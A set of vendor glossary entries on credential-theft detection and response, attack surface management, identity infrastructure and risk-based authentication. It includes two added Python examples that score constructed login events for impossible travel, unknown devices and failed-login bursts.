- Impossible travel activity. If a user's account is accessed from multiple distant locations within a short period, this could indicate that the credentials have been stolen, as physical travel between those locations would be impossible.
- Data exfiltration. Unusual downloads, uploads, or file transfers from an account could indicate that an attacker is stealing data using stolen login information.
- Password changes by unknown users. If a user's password is changed without their knowledge or request, this is a sign that the account has likely been hijacked by an unauthorized individual.

Organizations should monitor user accounts for these suspicious activities and configure automated alerts to detect potential credential theft events as soon as possible. Promptly notifying users about detected compromise and requiring password resets can help minimize damage from stolen login information. Frequent employee education and phishing simulation campaigns also help strengthen credential security and reduce the risk of theft.

Staying vigilant for signs of unauthorized access and taking swift action in response to detected events is key to protecting against the damages of credential theft. With constant monitoring and proactive defense, organizations can guard their systems and sensitive data from compromise via stolen login details.

## Responding to Credential Theft Incidents

Responding to credential theft incidents requires prompt action to limit damage. Once an organization discovers compromised credentials, the following steps should be taken:

- Identify the compromised accounts. Determine which user accounts have had their login credentials compromised. This may require analyzing account activity logs to find unauthorized logins or access. Identify both internal employee accounts as well as any external accounts, like social media profiles.
- Lock down the affected accounts. Immediately disable or lock the compromised accounts to prevent further unauthorized access. This includes disabling accounts on the organization’s network and systems as well as any linked external accounts like social media profiles.
- Reset account passwords. Require all users with stolen credentials to reset their passwords. This includes accounts used to access the organization’s network and systems as well as personal accounts like email, social media, and banking accounts.
Reset passwords for any accounts that used the same or similar login credentials.
- Enable MFA if available. For accounts that support MFA, like email, social media, and VPN access, require users to enable this additional layer of security. MFA adds an extra layer of protection for accounts in the event credentials are stolen again in the future.
- Monitor accounts for suspicious activity. Closely monitor the compromised accounts over the following weeks and months for any signs of further unauthorized access or suspicious logins. This can help detect if the credentials have been stolen again or if the cybercriminals still have access.
- Provide additional cybersecurity training. Reinforce good cybersecurity practices with additional education and training for all staff. This includes training on creating strong, unique passwords, identifying phishing emails, and other best practices for account security. Ongoing education and training help strengthen an organization's security posture against future credential theft attacks.

Following these steps can help limit the damage from credential theft incidents and reduce the likelihood of future attacks. With prompt response and action, organizations can contain security incidents, strengthen their defenses, and build staff awareness about account security risks.

## Conclusion

By understanding the methods and motivations behind credential theft, cyber security professionals can implement controls and safeguards to help detect and mitigate these types of attacks. While no defense is foolproof, maintaining awareness of the latest threats and taking a multi-layered approach to access control and identity management will help reduce risk and build resilience. By working together, security teams and individuals can stay ahead of the curve and protect their organizations' data, accounts, and networks.
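The indicators listed under Detecting Credential Theft above can be turned into alert logic. The following is an added example, not Silverfort's code or a product feature: it flags unknown devices, failed-login bursts and impossible travel over constructed login events, and the event schema, thresholds and coordinates are assumptions made for the example.

```python
"""Detection logic for three credential-theft indicators over constructed login events.

Added example (not Silverfort's code). Checks three of the indicators listed under
"Detecting Credential Theft": logins from unknown devices, bursts of failed logins,
and impossible travel. Event schema, thresholds and sample data are assumptions.
"""
from __future__ import annotations

import math
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class AuthEvent:
    ts: datetime
    user: str
    result: str   # "success" or "failure"
    device: str   # device identifier reported by the authenticating system (assumed)
    lat: float    # geolocation of the source IP (assumed to be available)
    lon: float


# Assumed thresholds; tune them to the environment.
FAILED_THRESHOLD = 5                    # this many failures ...
FAILED_WINDOW = timedelta(minutes=10)   # ... inside this window is a burst
MAX_PLAUSIBLE_KMH = 1000.0              # faster than airline travel => impossible


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance in kilometres between two coordinates."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def detect(events: list[AuthEvent], known_devices: dict[str, set[str]]) -> list[tuple[str, str, str]]:
    """Return (user, indicator, detail) alerts for the three indicators."""
    alerts: list[tuple[str, str, str]] = []
    by_user: dict[str, list[AuthEvent]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_user[e.user].append(e)

    for user, evs in by_user.items():
        successes = [e for e in evs if e.result == "success"]

        # Indicator 1: successful login from a device never seen for this user.
        for e in successes:
            if e.device not in known_devices.get(user, set()):
                alerts.append((user, "unknown_device", e.device))

        # Indicator 2: FAILED_THRESHOLD or more failures inside a sliding window.
        failures = [e.ts for e in evs if e.result == "failure"]
        for i, start in enumerate(failures):
            in_window = [t for t in failures[i:] if t - start <= FAILED_WINDOW]
            if len(in_window) >= FAILED_THRESHOLD:
                minutes = int(FAILED_WINDOW.total_seconds() // 60)
                alerts.append((user, "failed_login_burst",
                               f"{len(in_window)} failures within {minutes} min"))
                break  # one alert per user is enough

        # Indicator 3: consecutive successful logins implying travel faster than possible.
        for prev, cur in zip(successes, successes[1:]):
            km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            hours = (cur.ts - prev.ts).total_seconds() / 3600
            # Same-instant logins far apart are impossible; small distances are geolocation noise.
            if hours == 0:
                speed = math.inf if km > 50 else 0.0
            else:
                speed = km / hours
            if speed > MAX_PLAUSIBLE_KMH:
                alerts.append((user, "impossible_travel", f"{km:.0f} km in {hours:.1f} h"))
    return alerts


def run_sample() -> list[tuple[str, str, str]]:
    """Run the detector over constructed events (not real log data)."""
    t0 = datetime(2024, 1, 15, 9, 0)
    events = [
        # alice: login from New York, then two hours later from Frankfurt on a new device
        AuthEvent(t0, "alice", "success", "laptop-a1", 40.71, -74.01),
        AuthEvent(t0 + timedelta(hours=2), "alice", "success", "win-7f3", 50.11, 8.68),
        # carol: two logins within London on her known device
        AuthEvent(t0, "carol", "success", "mac-c2", 51.50, -0.12),
        AuthEvent(t0 + timedelta(hours=3), "carol", "success", "mac-c2", 51.52, -0.10),
    ]
    # bob: six failures in five minutes, the password-guessing pattern
    events += [AuthEvent(t0 + timedelta(minutes=m), "bob", "failure", "unknown", 48.85, 2.35)
               for m in range(6)]
    known = {"alice": {"laptop-a1"}, "bob": {"pc-b9"}, "carol": {"mac-c2"}}
    return detect(events, known)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```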
---

- Published: 2024-01-14
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/attack-surface-management/

The ongoing process of discovering, monitoring, and reducing an organization’s vulnerabilities and exposed assets to shrink its attack surface.

Attack Surface Management (ASM) is the process of monitoring, managing and reducing an organization's attack surface, which comprises all the vulnerabilities and weaknesses that malicious actors can exploit to gain unauthorized access. ASM helps identify, monitor, and minimize an organization's attack surface by gaining visibility into IT assets, vulnerabilities, and cyber risks.

Attack Surface Management solutions use asset discovery and inventory tools to gain visibility into all IT assets, including virtual, cloud, and shadow IT infrastructure and other previously unknown assets. They scan these assets for vulnerabilities and software misconfigurations that could be exploited. ASM also monitors an organization's external digital footprint, like domains and subdomains, to identify risks from exposed assets.

Armed with this information, cybersecurity teams can prioritize and mitigate the highest risks across the organization's attack surface. They can also simulate real-world cyberattacks to identify blind spots and see how well their defenses hold up. By shrinking the attack surface, organizations reduce the opportunities for compromise and make it more difficult for attackers to gain a foothold.

## Understanding the Attack Surface

An organization’s attack surface refers to all the possible entry points that could be exploited by an attacker to compromise systems and data. This includes on-premises assets like servers, desktops, routers and IoT devices, as well as identity and access management systems, cloud assets, and external systems connected to the organization's network. The attack surface is constantly evolving as new digital infrastructure, devices, and connections are added over time.
New vulnerabilities are frequently discovered in software and systems, and attackers are constantly developing new exploitation techniques. This means the attack surface is continually expanding and introducing new risks.

Some of the most common entry points in an attack surface include:

- On-premises endpoints like servers, desktops, laptops and IoT devices. These contain valuable data and access, and are often targeted.
- Cloud assets such as storage, databases, containers, and serverless functions. Cloud adoption has greatly increased the attack surface for most organizations.
- Identity and access management systems. Identity is an attack surface, since compromised credentials are one of the top attack vectors used to breach networks.
- External connections to partners, customers or subsidiary networks. These connections expand the attack surface and introduce risks from less trusted networks.
- Shadow IT systems set up by employees without organizational approval or oversight. These hidden systems are security blind spots in the attack surface.

Attack surface management is the practice of continuously identifying, analyzing, and reducing potential entry points to minimize risks. This includes gaining visibility into all assets, connections and access points in the organization’s infrastructure, and taking action to shrink the attack surface by closing vulnerabilities, reducing excess access, and improving security controls.

## The Value of Attack Surface Management

Attack Surface Management (ASM) provides significant value to organizations in managing cyber risk. ASM tools automatically discover and map all assets across an organization's environment, identifying vulnerabilities and misconfigurations. This enables security teams to gain visibility into the scope of their attack surface, prioritize risks, and remediate issues.
### Improved Security Posture

By gaining a comprehensive understanding of all assets and vulnerabilities, ASM strengthens an organization's security posture. Security teams can identify weaknesses, close security gaps, and reduce opportunities for compromise. With continuous monitoring, ASM solutions provide an always-up-to-date inventory of assets and risks. This allows organizations to make risk-based decisions and focus resources on the highest priority items.

### Reduced Risk

ASM mitigates risk by patching vulnerabilities and misconfigurations that could be exploited in an attack. Solutions can automatically discover new assets as they come online, check for vulnerabilities, and notify security teams so they can remediate risks before they are targeted. ASM also allows organizations to model how changes might impact their attack surface, so they can make adjustments to avoid increasing risk. By shrinking the attack surface, ASM makes it more difficult for adversaries to find entry points into the environment.

### Improved Compliance

For organizations with regulatory compliance requirements, ASM provides documentation and reporting to demonstrate risk management practices. Solutions track assets, vulnerabilities, and remediation in an auditable format. This reporting can help organizations comply with standards like PCI DSS, HIPAA, and GDPR. ASM gives an overview of the current security posture at any point in time and a historical record of risk and remediation.

## Core Functions of Attack Surface Management

Attack Surface Management (ASM) involves several core functions to help organizations identify, monitor, and reduce their attack surface.

### Discovery

The discovery phase focuses on identifying an organization's digital assets, including hardware, software, and services. This involves scanning networks to find connected devices and cataloging details about the operating systems, applications, and services running on them.
The discovery process aims to create an inventory of all assets that could be potential targets for cyber attacks.

### Testing

Penetration testing and vulnerability assessments are used to identify weaknesses in an organization's IT infrastructure and software. Ethical hackers will attempt to compromise systems and gain access to data to determine how attackers could exploit vulnerabilities. The testing process highlights risks that need to be addressed to strengthen security.

### Context

The context function examines how identified assets relate to business operations and assesses their importance. Critical data, systems, and infrastructure are prioritized to help determine where resources should be focused. Context also considers how vulnerabilities could be chained together for maximum impact. This helps organizations understand how exposed their critical assets are and the potential consequences of a cyber attack.

### Prioritization

With an understanding of vulnerabilities and risks, organizations can determine which issues need to be addressed first based on the criticality of the affected assets. Prioritization ensures that resources are allocated efficiently to reduce risks in a strategic manner. Factors like severity, exploitability, and business impact are all considered when prioritizing vulnerabilities.

### Remediation

The remediation process involves selecting and implementing solutions to eliminate or mitigate the vulnerabilities identified during the discovery and testing phases. This includes installing software patches, making configuration changes, decommissioning legacy systems, and deploying additional security controls. Remediation aims to methodically reduce an organization's attack surface by fixing weaknesses and improving resiliency.

## ASM and Its Role in Defeating Attackers

Attack Surface Management (ASM) takes a proactive approach to cybersecurity by focusing on vulnerabilities from an attacker's perspective.
Rather than waiting to respond to incidents, ASM aims to prevent them in the first place through continuous monitoring and remediation of the attack surface.

The attack surface refers to any point in an organization's infrastructure, applications, or end user devices that could be exploited by malicious actors to compromise systems and data. By understanding the attack surface and how it is changing over time, security teams can identify and fix vulnerabilities before attackers have a chance to leverage them.

### Continuous Mapping and Monitoring

ASM relies on automated tools to continuously discover and map the evolving attack surface, including internal and external-facing assets. Monitoring the attack surface ensures new vulnerabilities are detected quickly so they can be prioritized and remediated based on the level of risk. As new assets are added or configurations change, the tools rescan to update the organization's attack surface map.

### Prioritizing Risks That Matter

Not all vulnerabilities pose the same level of risk. ASM helps organizations focus on fixing serious weaknesses first by evaluating vulnerabilities based on factors like:

- Severity (how much damage could be caused if exploited)
- Exploitability (how easy it is for attackers to leverage the vulnerability)
- Exposure (whether the vulnerability is externally facing)
- Asset criticality (how important the vulnerable system is)

By prioritizing vulnerabilities in this way, security teams can allocate resources to address the risks that matter most.

### Reducing the Window of Opportunity

Attackers often exploit vulnerabilities within days or even hours of their disclosure. ASM aims to shrink the window of opportunity by enabling organizations to quickly identify and remediate serious weaknesses. The faster vulnerabilities can be fixed, the less time attackers have to leverage them for malicious purposes like infiltrating networks, stealing data, or holding systems for ransom.
In summary, ASM takes a proactive and risk-based approach to security that focuses on vulnerabilities from an attacker's perspective. By continuously monitoring the attack surface, security teams can identify and fix critical weaknesses before they are exploited. This helps reduce risk and close the window of opportunity for attackers.

## How to Identify Your Organization's Attack Surface

To effectively manage an organization's attack surface, IT and cybersecurity professionals first need to identify what constitutes that surface. An organization's attack surface encompasses all the vulnerabilities and weaknesses that malicious actors could potentially exploit to compromise systems and data.

The attack surface includes both external-facing and internal components. Externally, the attack surface consists of the organization's online presence, including its website(s), web applications, and any other internet-connected systems. These provide potential entry points for cybercriminals to gain access to networks and data. Internally, the attack surface includes all networked systems, servers, endpoints, applications, and databases within the organization. Vulnerabilities in any of these components could be leveraged to pivot deeper into networks or access sensitive information.

Some of the specific assets that make up an organization's attack surface include:

- Public IP addresses and domains
- Email servers and accounts
- VPNs and other remote access systems
- Firewalls, routers, and other network infrastructure
- Physical access control systems
- Employee endpoints like laptops, desktops, and mobile devices
- Internal applications and databases
- Cloud infrastructure and services
- IoT and OT devices

To identify the full attack surface, IT and cybersecurity teams should conduct regular audits and assessments of all internal and external systems and components. Vulnerability scanning tools can help automate the discovery of vulnerabilities and misconfigurations across the organization.
Penetration testing and red team exercises also provide valuable insights into potential attack vectors and entry points.

Continuously monitoring the attack surface is key to minimizing risks. As the organization's infrastructure, applications, and workforce evolve, new vulnerabilities and security gaps may emerge. Proactively identifying these changes helps ensure the attack surface remains as small as possible.

## Best Practices for Managing Your Attack Surface

To effectively manage an organization's attack surface, cyber security professionals recommend several best practices.

First, conduct routine audits and assessments of the attack surface. This includes identifying all internet-facing assets like servers, cloud resources, and web applications. It also means finding vulnerabilities that could be exploited as well as sensitive data that needs protection. Regular attack surface assessments allow organizations to gain visibility into the scope of their digital footprint and prioritize risks.

Second, minimize the attack surface area when possible. This can be done by removing unused internet-facing assets, closing down vulnerable ports and protocols, and implementing the principle of least privilege to limit access. Reducing the number of entry points and access helps cut down opportunities for compromise.

Third, continuously monitor the attack surface for changes and emerging threats. New assets, accounts, and software get added frequently, and vulnerabilities are discovered all the time. Constant monitoring, along with tools like security information and event management (SIEM) solutions, can quickly detect modifications to the attack surface and new risks. Organizations can then respond promptly to address them.

Fourth, enforce strong security controls and risk mitigation.
This includes implementing multi-factor authentication, keeping systems and software up to date with the latest patches, restricting access to sensitive data, and training users on security best practices. Robust controls significantly reduce vulnerabilities and the impact of potential attacks.

Finally, communicate attack surface management policies and procedures to all relevant personnel. Everyone, from C-level executives to IT administrators to end users, must understand their role in identifying and managing the attack surface. Promoting a culture of shared responsibility for cyber risk mitigation helps to shrink the overall attack surface.

Following these recommendations can help organizations take a proactive approach to attack surface management. Regular assessment, monitoring, control, and communication are all required to gain visibility and minimize vulnerabilities across the digital footprint. With diligent effort, companies can identify and fix weaknesses before they are exploited.

### What is External Attack Surface Management?

External Attack Surface Management (EASM) refers to the process of identifying, analyzing, and securing the exposed assets and vulnerabilities of an organization that are accessible...

---

- Published: 2024-01-14
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-infrastructure/

The collection of systems, authentication mechanisms, and access control policies enabling secure creation, verification, and management of digital identities within an organization.

Identity infrastructure refers to the systems and processes used to manage digital identities and access within an organization. It encompasses identity management systems, authentication mechanisms, and access control policies. As businesses increasingly rely on technology to operate and interact with customers, the ability to verify identities and control access to data and applications has become crucial.
Identity infrastructure ensures that only authorized individuals can access sensitive data and that their access is tailored to their specific needs and privileges.

Identity management systems create, store, and maintain digital identities. They contain profiles with attributes like names, emails, passwords, and access rights. Authentication mechanisms verify users' identities by checking their credentials, such as usernames and passwords, security keys, or biometrics. Access policies determine who can access which resources.

A robust identity infrastructure integrates these elements to provide secure and seamless access to applications and data. It employs strong authentication to verify users in a convenient manner. It grants access based on the principle of least privilege, only providing the minimum level of access needed. It uses identity management to create, modify, and remove access as roles and responsibilities change, increasing the identity security posture of the organization.

## Role of Identity Infrastructure in Cybersecurity

Identity infrastructure has evolved from traditional identity and access management (IAM) focused on internal users and resources to also encompass customer identity and access management (CIAM) for external users accessing web and mobile applications. Modern identity infrastructure must support a variety of authentication methods and federation standards to enable single sign-on across complex IT environments that incorporate on-premises and cloud resources, as well as external partners and customers.

Identity infrastructure is crucial for cybersecurity. It underpins secure access to digital resources, enabling organizations to verify users, control access, and monitor activity. Without properly implemented identity infrastructure, organizations cannot securely adopt new technologies like cloud services, mobile devices, and web applications. For these reasons, the framework of Identity Fabric was created.
Identity Fabric is a more holistic and integrated approach to managing identities across an organization. It encompasses various identity services and solutions, providing a unified and consistent identity experience across all platforms and environments. The idea is to weave together different identity technologies (like authentication, authorization, and user management) into a cohesive, scalable, and flexible framework. This approach facilitates better user experience, easier management, and enhances security.

## Role of Identity Segmentation within Identity Fabric

Identity Segmentation is a specific strategy or technique within the broader framework of Identity Fabric. It involves dividing or segmenting user access and identities to enhance security and limit potential risks. By implementing identity segmentation, an organization can ensure that users only have access to the resources necessary for their specific roles, minimizing the chance of unauthorized access to sensitive data.

In the context of an identity fabric, segmentation becomes an integral part of the overall identity management strategy. It fits within the fabric's goal of providing secure, efficient, and manageable identity solutions.

## Components of Identity Infrastructure

Identity infrastructure refers to the integrated components that establish and govern digital identities. It encompasses authentication, authorization, administration, and auditing, which work together to secure access to resources.

### Authentication

Authentication verifies the identity of a user or device trying to access a system. It typically involves a username and password, but can also use multi-factor methods like one-time passwords, biometrics, and security keys. Authentication ensures that only legitimate users and devices can access resources.

### Authorization

Authorization determines what level of access an authenticated identity has.
It establishes permissions and privileges by role, group membership, attributes, or other factors. Authorization enforces the principle of least privilege, where users have only the minimum access needed to perform their jobs.

### Administration

Administration manages the lifecycle of digital identities, including account creation, updates, and deprovisioning. Administrative roles control identity stores, set password policies, enable multi-factor authentication, and more. Proper administration is essential to maintain security and compliance.

### Auditing

Auditing tracks key events related to identities and access. It records activities like logins, privilege changes, and resource access requests. Auditing provides visibility into how identities and access are being used so issues can be detected and addressed. Audits should follow the zero trust model by verifying all events explicitly.

Together, these components establish a robust identity infrastructure following zero trust principles. They authenticate strictly, authorize minimally, administer properly, and audit continually. A strong identity foundation secures access across today's digital ecosystems, enabling secure collaboration and connectivity.

## Best Practices for Securing Identity Infrastructure

To secure an organization’s identity infrastructure, several best practices should be followed.

### Implement Single Sign-On

Single sign-on (SSO) allows users to access multiple applications with one set of login credentials. SSO reduces the risks associated with weak or reused passwords by limiting the number of credentials needed. It also improves the user experience by streamlining the login process. SSO should be implemented across as many applications as possible.

### Enable Multi-Factor Authentication

Multi-factor authentication (MFA) adds an extra layer of security for user logins. It requires not only a password but also another factor like a security code sent to the user's mobile device.
MFA helps prevent unauthorized access from stolen credentials. It should be enabled for all users, especially administrators with elevated access privileges.

### Manage User Roles and Access

A role-based access control model should be used to regulate what users can access based on their job functions. Users should only be granted the minimum level of access needed to perform their duties. Regular reviews of user access rights should be conducted to ensure permissions are still appropriate and valid. Excessive or unused access rights should be removed.

### Monitor Identity Analytics

Identity analytics solutions should be leveraged to detect anomalous behavior that could indicate compromised accounts or insider threats. Analytics can identify unusual login times, locations, devices, or access requests. Security teams should regularly review identity analytics reports and investigate risky events. Adjustments may need to be made to authentication policies or user access rights in response.

### Centralize Identity Management

A centralized identity management platform should be used to oversee all users and their access to applications and systems. This provides a single pane of glass view into an organization's identity infrastructure. It ensures consistent policies are applied across resources and simplifies the processes of provisioning, deprovisioning, and auditing users. With a centralized platform, security risks can be mitigated more easily through features like role management, access reviews, and identity governance.

## Implementing Identity Infrastructure

Implementing a modern identity infrastructure requires careful planning and execution. As organizations transition from legacy systems, they must integrate new solutions with existing infrastructure and processes. A strategic approach is key.

### Develop a Roadmap

The first step is creating a roadmap for integrating identity infrastructure across the organization.
This roadmap should outline a phased approach, starting with a pilot implementation. The roadmap establishes timelines, budgets, and metrics for success at each stage. It should address integrating with existing systems like HR databases as well as Single Sign-On (SSO) for streamlined user access. A roadmap helps ensure key stakeholders are aligned and major roadblocks are addressed early on.

#### Choose a Starting Point

For the initial implementation, select a subset of users and applications to include, such as employees accessing cloud apps. This focused start allows organizations to deploy the new solution, work out any issues, and build expertise before expanding to additional use cases. Starting small also makes the process more manageable, increasing the likelihood of success. Organizations can then build on early wins to gain buy-in for wider deployment.

#### Provide User Education

Educating users is essential for successful adoption of new identity infrastructure. Whether the solution is for employees, customers or partners, organizations must communicate how and why the new system is being implemented. They should outline any impacts to users, like password or login changes, and provide resources for help. Targeted education, especially for pilot groups, helps users feel prepared and invested in the solution.

#### Monitor and Optimize

After initial deployment, continued monitoring and optimization are required. Organizations should track metrics like user adoption, login times, and security incidents to ensure the solution is performing as intended. They can then make adjustments to improve the user experience, close any vulnerabilities, and expand functionality. Monitoring also provides data to build the business case for further investment in identity infrastructure.

### Security, Regulatory and Insurance Compliance

#### Security Compliance

Identity infrastructure enables organizations to control access to data and applications.
By implementing identity management best practices like multi-factor authentication, strong password requirements, and user provisioning and deprovisioning, organizations can securely manage access and help meet security compliance standards like GDPR, HIPAA, and PCI-DSS.

#### Regulatory Compliance

Regulations like GDPR, HIPAA, and PCI-DSS require organizations to control access to personal data and implement safeguards to protect information. Identity infrastructure allows organizations to:

- Manage user access and entitlements
- Track user access for auditing
- Implement separation of duties
- Disable access for terminated users
- Review user access rights regularly

By automating identity management processes, organizations can efficiently meet regulatory compliance requirements.

#### Cyber Insurance

Cyber insurance policies require organizations to follow best practices for access management and identity governance. Identity infrastructure demonstrates to insurance providers that an organization has strong controls in place to reduce risk. This may allow the organization to get more comprehensive coverage at a lower cost.

### Identity Infrastructure Trends and Innovations

As cyber threats become more sophisticated, identity infrastructure must evolve to provide enhanced security. Several trends are shaping the future of identity infrastructure.

Zero trust security is an approach that assumes there is no implicit trust granted to assets or user accounts based solely on their physical or network location. Zero trust security verifies anything and everything trying to connect to its systems before granting access. This "never trust, always verify" approach is becoming increasingly popular for identity infrastructure. Implementing zero trust security requires strong authentication methods like multi-factor authentication to verify users.

Biometrics, like fingerprint or facial recognition, provide a unique way to authenticate users based on their physical characteristics.
Biometric authentication is very difficult to spoof and helps prevent identity theft. More organizations are incorporating biometric authentication into their identity infrastructure. However, privacy concerns exist around the storage and use of biometric data. Regulations like GDPR place restrictions on how biometric data can be collected and stored.

Federated identity management enables users to use the same set of login credentials to access resources across multiple organizations or domains. This reduces the number of passwords users have to manage and enables single sign-on experiences. Standards like OpenID Connect and OAuth enable federated identity management and are being increasingly adopted.

The decentralization of identity infrastructure is an emerging trend. Blockchain technology and self-sovereign identity models give users more control over their digital identities. However, decentralized identity infrastructure is still quite new and standards are still emerging. Widespread adoption may take time.

### Conclusion

As more services and applications move to the cloud and remote work becomes more common, identity infrastructure ensures only authorized users can access the systems and data they need. When done well, it improves productivity and collaboration while reducing risk. However, if not implemented correctly, identity infrastructure can create vulnerabilities that malicious actors actively target. IT and security leaders must make identity infrastructure a priority, gain a thorough understanding of its components and best practices, and invest in robust solutions to authenticate and authorize users in a secure manner.

---

## Risk-Based Authentication

- Published: 2024-01-14
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/risk-based-authentication/

A dynamic authentication method that assesses contextual risk factors—such as location, device, and behavior—in real time and adjusts authentication strength accordingly.
Risk-based authentication (RBA) is an authentication method that evaluates the level of risk associated with a login attempt or transaction and applies additional security measures when the risk is high. Instead of a static one-size-fits-all approach, risk-based authentication evaluates dozens of data points in real time to establish a risk score for each user action. Based on the risk score, the system can then apply adaptive access controls to verify the user's identity.

RBA, also known as Risk-based Conditional Access, provides an alternative to static authentication methods by introducing a dynamic element that adjusts security controls based on the real-time, calculated risk of a transaction. RBA evaluates details about the user, device, location, network, and other attributes to detect anomalies that could signal fraud. If the risk score exceeds a defined threshold, the system may prompt for additional authentication factors like one-time passwords, push notifications, or biometric validation.

RBA aims to strike a balance between security and user experience. For low-risk transactions, it allows users to authenticate with a single factor like a password. But for higher risk transactions, it applies stronger authentication to verify the user's identity before allowing access. This risk-appropriate approach helps reduce fraud while minimizing unnecessary friction for legitimate users.

### How Risk-Based Authentication Works

Risk-based authentication (RBA) leverages machine learning and analytics to determine the level of risk for a given access request or transaction. It evaluates multiple factors like user identity, login location, time of access, device security posture, and previous access patterns to detect anomalies that could indicate fraud. Based on the assessed risk level, RBA applies adaptive authentication controls, requiring stronger verification for higher-risk scenarios.
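The scoring-and-threshold flow this section describes, as an added example that is not Silverfort's code or a description of its product: a small rule-based engine scores one login attempt from contextual signals (device, country, time of day, recent failed attempts, travel since the previous login) and maps the score onto one of three outcomes, allow, step-up or block. The signal weights, the two thresholds, the user profile and the sample logins are constructed assumptions; a production system would learn the weights from historical data rather than fix them by hand, but the decision structure is the same.

```python
"""Added example (not Silverfort's code): a minimal risk-based authentication
decision engine.  Each login attempt is scored from contextual signals and the
score selects one of three outcomes: allow, step-up (ask for a second factor)
or block.  The signal weights, thresholds, user profile and sample logins are
all constructed assumptions for illustration."""
from dataclasses import dataclass
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt
from typing import List, Optional, Set, Tuple

STEP_UP_THRESHOLD = 40        # assumed: at or above this, require a second factor
BLOCK_THRESHOLD = 80          # assumed: at or above this, refuse the request outright
IMPOSSIBLE_SPEED_KMH = 900    # assumed: faster than this between logins is "impossible travel"


@dataclass
class LoginEvent:
    user: str
    device_id: str
    country: str
    lat: float
    lon: float
    ts: datetime
    failed_attempts_last_hour: int = 0


@dataclass
class UserProfile:
    """Baseline learned from the user's history (constructed by hand here)."""
    known_devices: Set[str]
    known_countries: Set[str]
    usual_hours: range                  # UTC hours in which the user normally signs in
    last_login: Optional[LoginEvent] = None


def km_between(a: LoginEvent, b: LoginEvent) -> float:
    """Great-circle (haversine) distance between two login locations, in km."""
    lat1, lon1, lat2, lon2 = map(radians, (a.lat, a.lon, b.lat, b.lon))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def score_login(event: LoginEvent, profile: UserProfile) -> Tuple[int, List[str]]:
    """Additive rule-based score (0-100) plus the reasons that contributed.
    The fixed weights are assumptions chosen so the decision is easy to follow."""
    score, reasons = 0, []
    if event.device_id not in profile.known_devices:
        score += 30
        reasons.append("unknown device")
    if event.country not in profile.known_countries:
        score += 30
        reasons.append("unfamiliar country")
    if event.ts.hour not in profile.usual_hours:
        score += 15
        reasons.append("outside usual hours")
    if event.failed_attempts_last_hour >= 5:
        score += 25
        reasons.append("many recent failed attempts")
    prev = profile.last_login
    if prev is not None:
        hours = (event.ts - prev.ts).total_seconds() / 3600
        if hours > 0 and km_between(prev, event) / hours > IMPOSSIBLE_SPEED_KMH:
            score += 40
            reasons.append("impossible travel since last login")
    return min(score, 100), reasons


def decide(score: int) -> str:
    """Map a score onto the adaptive control: allow, step-up or block."""
    if score >= BLOCK_THRESHOLD:
        return "block"
    if score >= STEP_UP_THRESHOLD:
        return "step-up"
    return "allow"


def evaluate(event: LoginEvent, profile: UserProfile) -> Tuple[str, int, List[str]]:
    score, reasons = score_login(event, profile)
    return decide(score), score, reasons


# --- constructed sample data ------------------------------------------------
def _utc(hour: int, minute: int = 0) -> datetime:
    return datetime(2024, 5, 1, hour, minute, tzinfo=timezone.utc)

NYC = (40.7128, -74.0060)
SYD = (-33.8688, 151.2093)

SAMPLE_PROFILE = UserProfile(
    known_devices={"laptop-1"},
    known_countries={"US"},
    usual_hours=range(7, 20),
    last_login=LoginEvent("alice", "laptop-1", "US", *NYC, _utc(9)),
)

SAMPLE_EVENTS = [
    LoginEvent("alice", "laptop-1", "US", *NYC, _utc(10)),   # routine sign-in
    LoginEvent("alice", "phone-9", "US", *NYC, _utc(23)),    # new device, late at night
    LoginEvent("alice", "laptop-1", "AU", *SYD, _utc(11)),   # known device, impossible travel
    LoginEvent("alice", "kiosk-3", "AU", *SYD, _utc(11), failed_attempts_last_hour=7),
]


def run_samples() -> List[str]:
    """Decisions for the four sample events, in order."""
    return [evaluate(e, SAMPLE_PROFILE)[0] for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e.device_id, e.country, e.ts.hour, "->", evaluate(e, SAMPLE_PROFILE))
```

The four sample events walk up the scale: the routine login scores 0 and is allowed; a new device late at night scores 45 and triggers step-up; a known device that appears in Sydney two hours after a New York login is flagged as impossible travel and also steps up; the last event stacks every signal and is blocked.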
RBA solutions typically use a risk score that is calculated in real time for each access request or transaction. The score is determined based on rules and models built from historical data. If the score exceeds a predefined threshold, the system may prompt for additional authentication checks like security questions or OTP verification codes sent to a trusted device. For very high scores, the system can block the request altogether to prevent unauthorized access.

By analyzing numerous risk signals, RBA aims to strike a balance between security and user experience. It avoids subjecting users to overly stringent authentication steps when the risk appears normal. At the same time, it is able to detect subtle threats that rule-based systems may miss. RBA systems continue learning and adapting to changes in user behavior and access patterns over time. As the algorithms ingest more data, the risk models and thresholds become more accurate.

RBA is a key component of a robust identity and access management (IAM) program. When combined with strong authentication methods like multi-factor authentication (MFA), it provides an additional layer of protection for securing access to critical applications, systems and data. For organizations, RBA helps reduce fraud losses and compliance penalties while improving operational efficiency. For end users, it results in a streamlined authentication experience when risk levels are low.

### The Evolution of Authentication Methods

Authentication methods have evolved over time to address emerging threats and leverage new technologies. Originally, knowledge-based methods like passwords were the primary means of verifying a user's identity. However, passwords are prone to brute force attacks and users often choose weak or reused passwords that are easily compromised. To address the weaknesses of passwords, two-factor authentication (2FA) was introduced.
2FA requires not only knowledge (a password) but also possession of a physical token like a key fob that generates one-time codes. 2FA is more secure than passwords alone but physical tokens can be lost, stolen or hacked.

